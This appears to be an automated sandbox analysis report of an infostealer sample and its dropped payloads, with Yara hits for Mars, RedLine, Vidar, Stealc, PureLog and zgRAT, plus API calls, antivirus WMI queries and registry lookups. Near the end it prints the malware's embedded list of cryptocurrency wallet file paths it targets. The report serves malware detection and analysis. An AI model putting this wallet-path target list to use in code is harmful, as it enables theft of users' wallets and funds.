Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe "C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe"

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe

Code function: 1_2_6CA64760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

1_2_6CA64760

Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe

Code function: 2_2_6C853470 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,

2_2_6C853470

Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: TrayNotifyWndShell_TrayWnd
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32SVWU
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32S

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe

Code function: 0_2_00409D1B cpuid

0_2_00409D1B

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0042086B
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: EnumSystemLocalesW,	0_2_004170F1
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: EnumSystemLocalesW,	0_2_004201F6
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: EnumSystemLocalesW,	0_2_004201AB
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: EnumSystemLocalesW,	0_2_00420291
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0042031E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: GetLocaleInfoW,	0_2_004174E4
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: GetLocaleInfoW,	0_2_0042056E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00420697
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0041FF33
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: GetLocaleInfoW,	0_2_0042079E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: EnumSystemLocalesW,	0_2_03167358
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: GetLocaleInfoW,	0_2_03170A05
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_03170AD2
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0317019A
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_031708FE
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: GetLocaleInfoW,	0_2_0316774B
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: GetLocaleInfoW,	0_2_031707D5
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: GetLocaleInfoW,	0_2_031707D3
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: EnumSystemLocalesW,	0_2_03170412
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: EnumSystemLocalesW,	0_2_0317045D
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: EnumSystemLocalesW,	0_2_031704F8
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	1_2_00414570

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe

Code function: 0_2_0040996D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_0040996D

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe

Code function: 1_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA,

1_2_004143C0

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe

Code function: 1_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

1_2_004144B0

Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe

Code function: 2_2_00702DA6 _memset,GetVersionExW,

2_2_00702DA6

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Mars stealer

Source: Yara match	File source: 1.3.u42w.0.exe.2f00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u42w.0.exe.2ed0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u42w.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u42w.0.exe.2f00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u42w.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1714056198.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2089955902.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f4640000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f4860000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f4640000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f4860000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b0432f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7c4dad.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1add525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b28739.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7b47a3.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7a537d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.1978341064.00000173EE71B000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 3.2.cmd.exe.5e100c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.5a000c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.5a000c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.MSBuild.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.5e100c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2055548397.0000000005E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2204859505.0000000005A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2204440453.0000000001102000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7672, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\cqecfsbe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u42w.0.exe PID: 1720, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 1.3.u42w.0.exe.2f00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u42w.0.exe.2ed0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u42w.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u42w.0.exe.2f00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u42w.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1714056198.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2089955902.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u42w.0.exe PID: 1720, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b0432f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7c4dad.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1add525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b28739.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7b47a3.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7a537d.1.raw.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: sers\user\AppData\Roaming\\Electrum-LTC\wallets\\.
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: Jaxx Liberty
